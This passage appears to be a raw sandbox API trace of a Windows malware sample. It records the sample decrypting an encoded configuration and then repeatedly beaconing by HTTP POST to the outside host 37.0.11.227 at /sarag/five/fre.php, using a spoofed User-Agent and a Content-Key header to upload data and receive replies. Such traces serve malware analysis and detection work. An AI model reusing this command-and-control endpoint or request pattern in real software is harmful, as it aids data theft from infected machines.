%s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.977] GetProcessHeap () returned 0x690000 [0299.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0299.977] GetProcessHeap () returned 0x690000 [0299.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.977] GetProcessHeap () returned 0x690000 [0299.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0299.977] GetProcessHeap () returned 0x690000 [0299.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.978] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.978] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.978] GetProcessHeap () returned 0x690000 [0299.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.979] GetProcessHeap () returned 0x690000 [0299.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.979] send (s=0x9e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.979] send (s=0x9e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.980] GetProcessHeap () returned 0x690000 [0299.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.980] recv (in: s=0x9e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0301.705] GetProcessHeap () returned 0x690000 [0301.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0301.706] GetProcessHeap () returned 0x690000 [0301.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0301.706] GetProcessHeap () returned 0x690000 [0301.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0301.706] GetProcessHeap () returned 0x690000 [0301.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0301.707] closesocket (s=0x9e4) returned 0 [0301.708] GetProcessHeap () returned 0x690000 [0301.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0301.708] GetProcessHeap () returned 0x690000 [0301.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0301.709] GetProcessHeap () returned 0x690000 [0301.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0301.709] GetProcessHeap () returned 0x690000 [0301.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0301.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1704) returned 0x9e4 [0301.975] Sleep (dwMilliseconds=0xea60) [0301.987] GetProcessHeap () returned 0x690000 [0301.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0301.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0301.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0302.188] GetProcessHeap () returned 0x690000 [0302.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0302.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.191] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0302.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.193] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.194] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.194] GetProcessHeap () returned 0x690000 [0302.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0302.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.196] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0302.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.197] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0302.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.198] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0302.198] GetProcessHeap () returned 0x690000 [0302.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.434] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.445] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.449] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.451] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.451] GetProcessHeap () returned 0x690000 [0302.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0302.451] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0302.452] GetProcessHeap () returned 0x690000 [0302.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0302.453] GetProcessHeap () returned 0x690000 [0302.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0302.453] GetProcessHeap () returned 0x690000 [0302.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0302.453] GetProcessHeap () returned 0x690000 [0302.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0302.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0302.485] GetProcessHeap () returned 0x690000 [0302.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0302.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.487] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0302.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.488] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.489] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.489] GetProcessHeap () returned 0x690000 [0302.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0302.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.493] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0302.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.494] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0302.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.495] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0302.495] GetProcessHeap () returned 0x690000 [0302.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.497] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0302.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.498] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0302.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0302.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.500] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0302.500] GetProcessHeap () returned 0x690000 [0302.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0302.501] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0302.501] GetProcessHeap () returned 0x690000 [0302.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0302.501] socket (af=2, type=1, protocol=6) returned 0x9e8 [0302.505] connect (s=0x9e8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0302.543] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0302.543] GetProcessHeap () returned 0x690000 [0302.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0302.544] GetProcessHeap () returned 0x690000 [0302.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0302.544] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.545] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0302.545] GetProcessHeap () returned 0x690000 [0302.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0302.546] GetProcessHeap () returned 0x690000 [0302.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.546] GetProcessHeap () returned 0x690000 [0302.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0302.546] GetProcessHeap () returned 0x690000 [0302.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0302.547] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.548] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0302.548] GetProcessHeap () returned 0x690000 [0302.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0302.548] GetProcessHeap () returned 0x690000 [0302.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.548] send (s=0x9e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0302.550] send (s=0x9e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0302.550] GetProcessHeap () returned 0x690000 [0302.550] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0302.550] recv (in: s=0x9e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0302.625] GetProcessHeap () returned 0x690000 [0302.625] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0302.627] GetProcessHeap () returned 0x690000 [0302.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0302.627] GetProcessHeap () returned 0x690000 [0302.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0302.628] GetProcessHeap () returned 0x690000 [0302.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0302.628] closesocket (s=0x9e8) returned 0 [0302.630] GetProcessHeap () returned 0x690000 [0302.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0302.630] GetProcessHeap () returned 0x690000 [0302.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0302.630] GetProcessHeap () returned 0x690000 [0302.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0302.631] GetProcessHeap () returned 0x690000 [0302.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0302.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14a0) returned 0x9e8 [0302.644] Sleep (dwMilliseconds=0xea60) [0302.645] GetProcessHeap () returned 0x690000 [0302.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0302.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0302.659] GetProcessHeap () returned 0x690000 [0302.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0302.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.662] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0302.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.668] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.669] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.669] GetProcessHeap () returned 0x690000 [0302.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0302.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.671] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0302.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.671] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0302.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.675] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0302.675] GetProcessHeap () returned 0x690000 [0302.675] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.676] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.677] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.678] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.680] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.680] GetProcessHeap () returned 0x690000 [0302.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0302.680] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0302.680] GetProcessHeap () returned 0x690000 [0302.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0302.681] GetProcessHeap () returned 0x690000 [0302.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0302.681] GetProcessHeap () returned 0x690000 [0302.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0302.682] GetProcessHeap () returned 0x690000 [0302.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0302.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0302.698] GetProcessHeap () returned 0x690000 [0302.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0302.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.699] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0302.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.701] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.702] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.702] GetProcessHeap () returned 0x690000 [0302.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0302.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.704] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0302.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.707] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0302.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.708] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0302.708] GetProcessHeap () returned 0x690000 [0302.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.709] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0302.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.711] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0302.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.711] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0302.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.713] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0302.713] GetProcessHeap () returned 0x690000 [0302.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0302.713] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0302.713] GetProcessHeap () returned 0x690000 [0302.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0302.713] socket (af=2, type=1, protocol=6) returned 0x9ec [0302.714] connect (s=0x9ec, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0302.740] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0302.740] GetProcessHeap () returned 0x690000 [0302.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0302.740] GetProcessHeap () returned 0x690000 [0302.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0302.741] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.743] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0302.743] GetProcessHeap () returned 0x690000 [0302.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0302.743] GetProcessHeap () returned 0x690000 [0302.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.743] GetProcessHeap () returned 0x690000 [0302.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0302.743] GetProcessHeap () returned 0x690000 [0302.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0302.744] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.745] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: 